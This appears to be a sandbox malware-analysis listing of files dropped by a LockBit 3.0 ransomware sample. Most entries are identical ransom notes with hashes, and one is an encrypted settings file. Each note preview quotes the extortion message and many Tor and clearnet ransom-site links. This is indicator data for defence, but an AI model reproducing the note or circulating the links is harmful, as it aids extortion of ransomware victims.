                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979579815966601
                Encrypted:false
                SSDEEP:192:OXPYLL5w3ppxwZXeMxyn93pYLADsrq0zOP4XbfJw3C0o:ec6JwZmbaADHCOPYqSd
                MD5:C54D59D437B6B80B7ECF894CAFB81DEE
                SHA1:8113B3EAD943D6E66D9C0C944735FCFCDBC7C1B9
                SHA-256:E6DCFD4ADD74BD46BEDD496C00E21E851CEA0C2E464411511465C40478FDE1B4
                SHA-512:057B7004561CC7656A202694270B11D5C5D5DA9AE661DEDAC5D39DB2F0F78F760EE0354806417FC86DF9E957AA643C284455F902EC5DA6DBF3D5B48F82EC266A
                Malicious:false
                Preview:..."Z@.>.BD.Ho.#....4(..(.?....Q~j.f....B?........y#.a.;...."........A...O^..i..C....0/.J.&..A.K....sg.t..R...ZyO...P(...dk.n'..r..O...x.!.U......64..k.2M.V.P....m.i.?TPw.......y......:. ;..z.{.I.C........f'..]......)...7@.._.9..1.....CX..?..r7.".......Yg*+.... =.b.-.....i.v.E..H..+..H.X...hC.~e..n.jgtL.../..J...P...........Uz........dz#..Y.MG..1.U+.l..G,o[..m.FZ..#]........].;ZiW.C.u(.........H.q.b-...Qtu..6>..W...F.H.PMmZlq..$..n'7..y.............Z..]~..nD..+.......].q......E`.5..5......c\..&J....E...cp...E.#.uG{..q....}.e.2f.9..i...u_........J .>.....*....P/.E...+4.y.l.....j*,...[;2-.....5..3o./........#n..S.[r...J...K.....v...8i.D.....D..y.R...o./.R...a.JK..V...........Y......Q..z..../H4...F&.....h}.+.....?.....J..k..s0.b....o.e.........l.l.....#.gL...kl.q..fY1&..`...".\r. ...a..T.......e(*.F9.XYx.fk3A.V.J....0..6e..g.|.....z..1.........V..@..j.;r>Y..J..di.G+....y.y.>...^..........OlO.D.a...x@c..Wn......f......y.!....;Jti

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

